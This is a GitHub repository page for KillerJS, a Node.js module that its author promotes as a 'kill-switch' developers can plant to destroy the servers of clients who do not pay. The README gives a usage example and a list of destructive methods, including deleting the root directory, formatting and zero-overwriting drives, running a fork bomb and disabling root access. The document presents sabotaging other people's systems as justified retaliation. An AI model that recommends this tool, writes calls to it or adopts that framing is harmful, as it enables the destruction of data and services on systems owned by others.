Skip to content

A Server-Killer that Doesn't Kill Server Process but Kills the entire Functioning of the Server.

License

Notifications You must be signed in to change notification settings

0xDaksh/KillerJS

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

28 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

KillerJS

Kills any Server in an Instant, This module Doesn't Kill Server Process but Kills the entire Functioning of the Server. It's essentially a kill-switch for those scammers out there who get the work done by Developers but Don't pay or Block.

Use it with Caution

I'm not responsible if you destroy your PC or Somehting, It's just made for the Developers who get scammed by Clients and Hence can destroy their Server for The Damage Caused to them and their Code.

Please Use it with Caution and I do-not recommend using it on your own pc or even a Server. Try it on a Virtual Machine, if you want to but Never Use it with your Main Computer.

How It Works?

  • Import It
  • Run it as a Function or Use the Set of Methods Below
  • Returns a Promise
  • Use the JavaScript Then function to Know if the Server has been Killed or not.
  • Use the JavaScript Catch function to Check What error occured.

The Code

var killer = require('killerjs')
killer.destroyRoot().then((status) => {
    console.log(status) // Killed the Server
}).catch((err) => {
    console.log(err) // Insufficent Permissions (Run with Root.)
})

Methods

    killer.destroyRoot() // destroys the root dir
    killer.format() // formats the HDD
    killer.overWrite() // overWrites the HDD With Zeros
    killer.implode() // implodes the Drive
    killer.wipe() // wipes the harddrive
    killer.forkBomb() // a Fork Bomb
    killer.disableRoot() // disables root access for all
    killer.destroyProject() // destroys your Project dir
    killer.destroyADir('AddTheDirectoryToKillHere') // kills that following dir

Extras

License

Licensed Under the MIT License to Daksh Miglani

About

A Server-Killer that Doesn't Kill Server Process but Kills the entire Functioning of the Server.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published